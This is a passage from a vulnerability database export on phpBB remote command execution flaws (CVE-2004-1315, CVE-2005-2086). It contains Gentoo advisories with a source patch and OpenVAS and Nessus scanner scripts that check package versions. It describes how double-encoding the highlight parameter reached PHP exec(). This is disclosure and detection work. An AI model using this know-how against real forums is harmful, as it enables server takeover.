highlighting vulnerability to access the PHP exec() function without restriction, allowing them to run arbitrary commands with the rights of the web server user (for example the apache user). Furthermore, the username handling vulnerability might be abused to execute SQL statements on the phpBB database. \n\n### Workaround\n\nThere is a one-line patch which will remediate the remote execution vulnerability. \n\nLocate the following block of code in viewtopic.php: \n\n` // // Was a highlight request part of the URI? // $highlight_match = $highlight = ''; if (isset($HTTP_GET_VARS['highlight'])) { // Split words and phrases $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight'])))); for($i = 0; $i < sizeof($words); $i++) {`\n\nReplace with the following: \n\n` // // Was a highlight request part of the URI? // $highlight_match = $highlight = ''; if (isset($HTTP_GET_VARS['highlight'])) { // Split words and phrases $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight']))); for($i = 0; $i < sizeof($words); $i++) {`\n\n### Resolution\n\nAll phpBB users should upgrade to the latest version to fix all known vulnerabilities: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/phpbb-2.0.11\"", "edition": 1, "modified": "2006-05-22T00:00:00", "published": "2004-11-24T00:00:00", "id": "GLSA-200411-32", "href": "https://security.gentoo.org/glsa/200411-32", "type": "gentoo", "title": "phpBB: Remote command execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:41", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2086"], "edition": 1, "description": "### Background\n\nphpBB is an Open Source bulletin board package. \n\n### Description\n\nRon van Daal discovered that phpBB contains a vulnerability in the highlighting code. \n\n### Impact\n\nSuccessful exploitation would grant an attacker unrestricted access to the PHP exec() or system() functions, allowing the execution of arbitrary commands with the rights of the web server. \n\n### Workaround\n\nPlease follow the instructions given in the phpBB announcement. \n\n### Resolution\n\nThe phpBB package is no longer supported by Gentoo Linux and has been masked in the Portage repository, no further announcements will be issued regarding phpBB updates. Users who wish to continue using phpBB are advised to monitor and refer to www.phpbb.com for more information. \n\nTo continue using the Gentoo-provided phpBB package, please refer to the Portage documentation on unmasking packages and upgrade to 2.0.16.", "modified": "2005-09-03T00:00:00", "published": "2005-07-04T00:00:00", "id": "GLSA-200507-03", "href": "https://security.gentoo.org/glsa/200507-03", "type": "gentoo", "title": "phpBB: Arbitrary command execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1315"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200411-32.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54753", "href": "http://plugins.openvas.org/nasl.php?oid=54753", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200411-32 (phpBB)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"phpBB contains a vulnerability which allows a remote attacker to execute\narbitrary commands with the rights of the web server user.\";\ntag_solution = \"All phpBB users should upgrade to the latest version to fix all known\nvulnerabilities:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/phpbb-2.0.11'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200411-32\nhttp://bugs.gentoo.org/show_bug.cgi?id=71681\nhttp://www.phpbb.com/phpBB/viewtopic.php?t=240513\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200411-32.\";\n\n \n\nif(description)\n{\n script_id(54753);\n script_cve_id(\"CVE-2004-1315\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200411-32 (phpBB)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-apps/phpbb\", unaffected: make_list(\"ge 2.0.11\"), vulnerable: make_list(\"le 2.0.10\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1315"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-27T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52540", "href": "http://plugins.openvas.org/nasl.php?oid=52540", "type": "openvas", "title": "FreeBSD Ports: phpbb", "sourceData": "#\n#VID e3cf89f0-53da-11d9-92b7-ceadd4ac2edd\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: phpbb\n\nCVE-2004-1315\nviewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the\nhighlight parameter when extracting words and phrases to highlight,\nwhich allows remote attackers to execute arbitrary PHP code by\ndouble-encoding the highlight value so that special characters are\ninserted into the result, which is then processed by PHP exec, as\nexploited by the Santy.A worm.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.phpbb.com/support/documents.php?mode=changelog\nhttp://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240636\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=110029415208724\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=110079436714518\nhttp://www.vuxml.org/freebsd/e3cf89f0-53da-11d9-92b7-ceadd4ac2edd.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52540);\n script_version(\"$Revision: 4148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-1315\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: phpbb\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"phpbb\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.0.11\")<0) {\n txt += 'Package phpbb version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2086"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-27T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:53989", "href": "http://plugins.openvas.org/nasl.php?oid=53989", "type": "openvas", "title": "FreeBSD Ports: phpbb", "sourceData": "#\n#VID 4afacca1-eb9d-11d9-a8bd-000cf18bbe54\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: phpbb\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.frsirt.com/english/advisories/2005/0904\nhttp://www.phpbb.com/phpBB/viewtopic.php?t=302011\nhttp://www.vuxml.org/freebsd/4afacca1-eb9d-11d9-a8bd-000cf18bbe54.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(53989);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 4148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2005-2086\");\n script_name(\"FreeBSD Ports: phpbb\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"phpbb\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.0.16\")<0) {\n txt += 'Package phpbb version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T10:50:57", "description": "The ChangeLog for phpBB 2.0.11 states :\n\nChanges since 2.0.10\n\n- Fixed vulnerability in highlighting code (very high severity, please\nupdate your installation as soon as possible)\n\n- Fixed unsetting global vars - Matt Kavanagh\n\n- Fixed XSS vulnerability in username handling - AnthraX101\n\n- Fixed not confirmed sql injection in username handling - warmth\n\n- Added check for empty topic id in topic_review function\n\n- Added visual confirmation mod to code base\n\nAdditionally, a US-CERT Technical Cyber Security Alert reports :\n\nphpBB contains an user input validation problem with regard to the\nparsing of the URL. An intruder can deface a phpBB website, execute\narbitrary commands, or gain administrative privileges on a compromised\nbulletin board.", "edition": 26, "published": "2005-07-13T00:00:00", "title": "FreeBSD : phpbb -- arbitrary command execution and other vulnerabilities (e3cf89f0-53da-11d9-92b7-ceadd4ac2edd)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1315"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:phpbb"], "id": "FREEBSD_PKG_E3CF89F053DA11D992B7CEADD4AC2EDD.NASL", "href": "https://www.tenable.com/plugins/nessus/19146", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19146);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-1315\");\n script_xref(name:\"CERT\", value:\"497400\");\n\n script_name(english:\"FreeBSD : phpbb -- arbitrary command execution and other vulnerabilities (e3cf89f0-53da-11d9-92b7-ceadd4ac2edd)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The ChangeLog for phpBB 2.0.11 states :\n\nChanges since 2.0.10\n\n- Fixed vulnerability in highlighting code (very high severity, please\nupdate your installation as soon as possible)\n\n- Fixed unsetting global vars - Matt Kavanagh\n\n- Fixed XSS vulnerability in username handling - AnthraX101\n\n- Fixed not confirmed sql injection in username handling - warmth\n\n- Added check for empty topic id in topic_review function\n\n- Added visual confirmation mod to code base\n\nAdditionally, a US-CERT Technical Cyber Security Alert reports :\n\nphpBB contains an user input validation problem with regard to the\nparsing of the URL. An intruder can deface a phpBB website, execute\narbitrary commands, or gain administrative privileges on a compromised\nbulletin board.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=74106\"\n );\n # http://www.uscert.gov/cas/techalerts/TA04-356A.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6894b814\"\n );\n # http://www.phpbb.com/support/documents.php?mode=changelog\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpbb.com/support/documents.php?mode=changelog\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110029415208724\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=110029415208724\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110079436714518\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=110079436714518\"\n );\n # http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240636\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpbb.com/community/viewtopic.php?f=14&t=240636\"\n );\n # https://vuxml.freebsd.org/freebsd/e3cf89f0-53da-11d9-92b7-ceadd4ac2edd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e54a29b4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpBB viewtopic.php Arbitrary Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpbb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpbb<2.0.11\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:53", "description": "The remote host is affected by the vulnerability described in GLSA-200411-32\n(phpBB: Remote command execution)\n\n phpBB contains a vulnerability in the highlighting code and several\n vulnerabilities in the username handling code.\n \nImpact :\n\n An attacker can exploit the highlighting vulnerability to access the\n PHP exec() function without restriction, allowing them to run arbitrary\n commands with the rights of the web server user (for example the apache\n user). Furthermore, the username handling vulnerability might be abused\n to execute SQL statements on the phpBB database.", "edition": 26, "published": "2004-11-24T00:00:00", "title": "GLSA-200411-32 : phpBB: Remote command execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1315"], "modified": "2004-11-24T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:phpbb", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200411-32.NASL", "href": "https://www.tenable.com/plugins/nessus/15826", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200411-32.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15826);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-1315\");\n script_xref(name:\"GLSA\", value:\"200411-32\");\n\n script_name(english:\"GLSA-200411-32 : phpBB: Remote command execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200411-32\n(phpBB: Remote command execution)\n\n phpBB contains a vulnerability in the highlighting code and several\n vulnerabilities in the username handling code.\n \nImpact :\n\n An attacker can exploit the highlighting vulnerability to access the\n PHP exec() function without restriction, allowing them to run arbitrary\n commands with the rights of the web server user (for example the apache\n user). Furthermore, the username handling vulnerability might be abused\n to execute SQL statements on the phpBB database.\"\n );\n # http://www.phpbb.com/phpBB/viewtopic.php?t=240513\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpbb.com/community/viewtopic.php?t=240513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200411-32\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpBB users should upgrade to the latest version to fix all known\n vulnerabilities:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/phpbb-2.0.11'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpBB viewtopic.php Arbitrary Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpbb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apps/phpbb\", unaffected:make_list(\"ge 2.0.11\"), vulnerable:make_list(\"lt 2.0.10\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpBB\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:26:24", "description": "The remote host is running phpBB. There is a flaw in the remote\nsoftware that could allow anyone to inject arbitrary SQL commands in\nthe login form. An attacker could exploit this flaw to bypass the\nauthentication of the remote host or execute arbitrary SQL statements\nagainst the remote database.\n\nESMARKCONANT is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-11-22T00:00:00", "title": "phpBB viewtopic.php highlight Parameter SQL Injection (ESMARKCONANT)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1315"], "modified": "2004-11-22T00:00:00", "cpe": ["cpe:/a:phpbb_group:phpbb"], "id": "PHPBB_LOGIN_FORM_SQL.NASL", "href": "https://www.tenable.com/plugins/nessus/15780", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(15780);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2004-1315\");\n script_bugtraq_id(11716);\n script_xref(name:\"CERT\", value:\"497400\");\n script_xref(name:\"EDB-ID\", value:\"647\");\n \n script_name(english:\"phpBB viewtopic.php highlight Parameter SQL Injection (ESMARKCONANT)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"A remote web application is vulnerable to SQL injection.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running phpBB. There is a flaw in the remote\nsoftware that could allow anyone to inject arbitrary SQL commands in\nthe login form. An attacker could exploit this flaw to bypass the\nauthentication of the remote host or execute arbitrary SQL statements\nagainst the remote database.\n\nESMARKCONANT is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the latest version of this software.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpBB viewtopic.php Arbitrary Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/11/22\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/11/12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_summary(english:\"SQL Injection\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"CGI 